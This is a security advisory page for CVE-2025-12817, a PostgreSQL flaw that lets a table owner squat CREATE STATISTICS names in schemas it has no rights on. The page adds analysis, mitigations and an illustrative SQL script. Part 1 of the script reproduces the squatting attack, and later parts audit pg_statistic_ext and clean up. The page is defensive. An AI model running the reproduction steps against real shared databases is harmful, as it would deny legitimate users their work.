
CVE-2025-12817: Missing Authorization in PostgreSQL

Severity: Low
Tags: Vulnerability, CVE-2025-12817
Published: Thu Nov 13 2025 (11/13/2025, 13:00:12 UTC)
Source: CVE Database V5
Product: PostgreSQL

Description

Missing authorization in PostgreSQL CREATE STATISTICS command allows a table owner to achieve denial of service against other CREATE STATISTICS users by creating in any schema. A later CREATE STATISTICS for the same name, from a user having the CREATE privilege, would then fail. Versions before PostgreSQL 18.1, 17.7, 16.11, 15.15, 14.20, and 13.23 are affected.

AI-Powered Analysis

Last updated: 11/13/2025, 13:21:20 UTC

Technical Analysis

CVE-2025-12817 is a missing-authorization flaw in PostgreSQL's CREATE STATISTICS command. CREATE STATISTICS builds an extended-statistics object (ndistinct, dependencies or MCV statistics across several columns) for one table, and the only ownership requirement it enforces is that the caller owns that table. Before the fix, the command did not also verify that the caller holds the CREATE privilege on the schema in which the statistics object is placed. A table owner could therefore give the object a schema-qualified name and have it created in any schema of the database, including schemas on which they hold no privileges at all. Statistics object names are unique within a schema, so when a user who legitimately holds CREATE on that schema later runs CREATE STATISTICS with the same schema-qualified name, the command fails with an "already exists" error. That is the denial of service: it is confined to the squatted name in the squatted schema, the legitimate user can choose another name, and only the object's owner or a superuser can drop the squatting object. Versions before 18.1, 17.7, 16.11, 15.15, 14.20 and 13.23 are affected. Confidentiality and integrity are not impacted. Exploitation requires a database login that owns at least one table, a privilege level that most application and developer roles already have, and needs no user interaction; it is reachable over the network wherever the server accepts remote connections. No exploits in the wild are known, and the issue is rated Low severity under CVSS v3.1. The root cause is the missing schema-level CREATE privilege check; the fixed versions add it, so a table owner without CREATE on the target schema is now refused.

Potential Impact

For European organizations, the practical impact is narrow: a denial of service against a single extended-statistics object name in a single schema. Existing statistics objects, the planner and running queries are unaffected; what fails is the next CREATE STATISTICS for the squatted name by a user who legitimately holds CREATE on that schema. The blocked user can normally work around it by choosing another name, so the cost is mostly confusion and administrator time, unless tooling that hard-codes statistics names (schema migrations, deployment scripts) aborts on the unexpected error. Only the squatting object's owner or a superuser can remove it. Multi-tenant or shared database environments, where untrusted or partly trusted roles own tables, are the realistic exposure: a malicious or compromised table owner can pre-register names in schemas belonging to other tenants. Given PostgreSQL's wide adoption in European finance, government and technology organizations, the issue is worth patching as part of the regular minor-release cycle, but the Low severity rating and the table-owner prerequisite confine the risk to environments that hand table ownership to potentially untrusted users.

Mitigation Recommendations

The fix is to upgrade to 18.1, 17.7, 16.11, 15.15, 14.20 or 13.23 (or later in each branch); these are minor releases, so they need only a binary upgrade and restart, not a dump and restore. Until then, note what does and does not help. Schema-level permissions do not help before the patch, because the bug is precisely that CREATE STATISTICS ignores the schema's CREATE privilege; they matter only once the server is patched. What does reduce exposure is limiting who can own tables, which in practice means auditing which roles hold CREATE on any schema and revoking it where it is not needed. Log DDL (log_statement = 'ddl' or higher) so that CREATE STATISTICS commands appear in the server log, and review any that name a schema the executing role has no CREATE privilege on. Audit pg_statistic_ext for statistics objects whose owner lacks CREATE on the object's schema; a superuser can remove a squatting object with DROP STATISTICS, which immediately frees the name, so no backup restoration is involved. Finally, track the PostgreSQL security advisories and apply minor releases promptly.
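The following SQL is added here as an illustration; it is not code from the PostgreSQL project or from the original advisory. It walks through the squatting scenario described in the Technical Analysis and then the pg_statistic_ext audit and DROP STATISTICS clean-up from the Mitigation Recommendations. The role, schema, table and object names (alice, bob, app, sandbox, orders, events, orders_stats) are hypothetical. Run it with psql as a superuser on a throwaway database, without ON_ERROR_STOP, because one statement is expected to fail on an unpatched server (and a different one on a patched server).

```sql
-- Added example: not from the PostgreSQL project or the original advisory.
-- Roles, schemas, tables and object names are hypothetical. Run as a superuser
-- with psql on a throwaway database, without ON_ERROR_STOP.

-- Part 1: the scenario from the advisory.
CREATE ROLE alice LOGIN;                       -- attacker: owns a table, no rights on schema app
CREATE ROLE bob   LOGIN;                       -- victim: legitimately holds CREATE on schema app
CREATE SCHEMA app;
GRANT USAGE, CREATE ON SCHEMA app TO bob;
CREATE SCHEMA sandbox AUTHORIZATION alice;     -- alice's own schema; she owns what she creates here

SET ROLE alice;
CREATE TABLE sandbox.orders (customer_id int, region text);
-- Before the fix this succeeds although alice has no CREATE (or even USAGE)
-- privilege on schema app: only ownership of sandbox.orders was checked.
-- On 18.1/17.7/16.11/15.15/14.20/13.23 it is rejected with a
-- permission-denied error for schema app.
CREATE STATISTICS app.orders_stats (ndistinct) ON customer_id, region FROM sandbox.orders;
RESET ROLE;

SET ROLE bob;
CREATE TABLE app.events (customer_id int, region text);
-- On an unpatched server this is the denial of service: the name is already
-- taken in schema app, so the command fails with an "already exists" error.
-- bob cannot drop the squatting object because alice owns it.
CREATE STATISTICS app.orders_stats (dependencies) ON customer_id, region FROM app.events;
RESET ROLE;

-- Part 2: the audit from the mitigation notes. Lists extended-statistics
-- objects whose owner does not hold CREATE on the schema the object lives in;
-- on an unpatched server the object alice created in Part 1 qualifies.
-- Caveats: superusers always pass has_schema_privilege(), and an owner whose
-- CREATE privilege was legitimately revoked after creation is also listed.
SELECT n.nspname                      AS schema,
       s.stxname                      AS statistics_object,
       pg_get_userbyid(s.stxowner)    AS owner,
       c.relnamespace::regnamespace   AS table_schema,
       c.relname                      AS table_name
FROM   pg_statistic_ext s
JOIN   pg_namespace     n ON n.oid = s.stxnamespace
JOIN   pg_class         c ON c.oid = s.stxrelid
WHERE  NOT has_schema_privilege(s.stxowner, s.stxnamespace, 'CREATE')
ORDER  BY 1, 2;

-- Part 3: remediation and clean-up (as superuser). DROP STATISTICS by the
-- superuser or the owner frees the name; no restore from backup is needed.
-- (On a patched server this DROP fails because Part 1 never created the object.)
DROP STATISTICS app.orders_stats;
DROP OWNED BY alice, bob;                      -- drops sandbox, orders, events; revokes bob's grants
DROP SCHEMA app;
DROP ROLE alice, bob;
```

The audit query is the piece worth keeping in a scheduled check: extended-statistics objects are rare enough that any row it returns deserves a look, and on a patched server a row can only mean a pre-patch squat or a later privilege change.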


Technical Details

Data Version: 5.2
Assigner Short Name: PostgreSQL
Date Reserved: 2025-11-06T17:22:31.286Z
CVSS Version: 3.1
State: PUBLISHED

Threat ID: 6915d923f0c8e942cdf27492

Added to database: 11/13/2025, 1:12:03 PM

Last enriched: 11/13/2025, 1:21:20 PM

Last updated: 11/14/2025, 6:19:41 AM

